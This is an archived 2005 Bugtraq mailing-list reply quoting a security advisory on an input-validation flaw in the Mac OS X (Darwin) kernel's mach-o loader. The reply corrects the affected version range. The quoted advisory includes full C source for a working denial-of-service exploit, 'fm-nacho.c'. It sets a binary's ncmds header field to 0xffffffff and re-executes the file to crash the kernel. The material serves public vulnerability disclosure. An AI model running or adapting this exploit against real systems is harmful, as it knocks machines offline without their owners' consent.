lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20050120010724.GB23226@shizzle.darkridge.org>
Date: Thu, 20 Jan 2005 09:07:24 +0800
From: neil@...kridge.org
To: bugtraq@...urityfocus.com
Subject: Re: Darwin Kernel Vulnerability


On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@...inemenace.org wrote:
> "moderator: resending this mail since it appears to of got dropped, if not, please ignore this message.
> 
>                      _,'|             _.-''``-...___..--';)
>                      /_ \'.      __..-' ,      ,--...--'''
>                     <\    .`--'''       `     /'
>                     `-';'               ;   ; ;
>                __...--''     ___...--_..'  .;.'
>            fL (,__....----'''       (,..--''  felinemenace.org
> 
>> Program:	Darwin Kernel 7.1
Effects <= Darwin Kernel 7.7.0
Sorry about the rushed advisory.
- nemo 
> Impact:		DoS, Possible local privilege escalation.	
> Discovered:	8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
> 
> 1) Background
> 
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3
> Some of the bugs we investigated exist due to lack of input validation in the mach-o 
> loader.
> 
> 2) Description
> 
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part
> each field is trusted to be acceptable.
> 
> In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as 
> signed integers, however the appropriate structs used to read from the file are 
> unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1. 
> 
> 	ncmds = header->ncmds; 
> 			while (ncmds--) {
> 
> The attached code will cause a denial of service on MacOSX <= 10.3.7
> 
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have not 
> had time to follow through on most of them. Something that caught our attention 
> was the misuse of the copyinstr() command. This function will not force a NULL
> character to be appended to the string copied in, however it seems in many cases
> the size passed to the function doesn't take this into account.
> Unfortunately, as security goes, its all about who posts first. 
> http://www.immunitysec.com/downloads/nukido.pdf
> 
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
> 
> 5) Exploit
> 
> //---------------------( fm-nacho.c )--------------------------
> /*
>  * DoS for Darwin Kernel Version < 7.5.0
>  * -(nemo@...ltheplug.org)-
>  * 2005
>  *
>  * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
>  * irc.pulltheplug.org (#social)
>  */
> 
> #include <stdio.h>
> 
> int main(int ac, char **av)
> {
>         FILE *me;
>         int rpl = 0xffffffff;
>         fpos_t pos = 0x10;
>         printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
>         printf("-( nemo@...ltheplug.org )-\n\n");
>         printf("[+] Opening file for writing.\n");
>         if(!(me = fopen(*av,"r+"))) {
>                 printf("[-] Error opening exe.\n");
>                 exit(1);
>         }
>         printf("[+] Seeking to ncmds.\n");
>         if((fsetpos(me,&pos)) == -1) {
>                 printf("[-] Error seeking to ncmds.\n");
>                 exit(1);
>         }
>         printf("[+] Changing ncmds to 0x%x.\n",rpl);
>         if(fwrite(&rpl,4,1,me) < 1) {
>                 printf("[-] Error writing to file.\n");
>                 exit(1);
>         }
>         fclose(me);
>         printf("[+] Re-executing with modified mach-o header.\n");
>         sleep(5);
>         if(execv(*av,av) == -1 ) {
>                 printf("[-] Error executing %s, please run manually.\n",*av);
>                 exit(1);
>         }
>         exit(0); // hrm
> }
> 
> 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ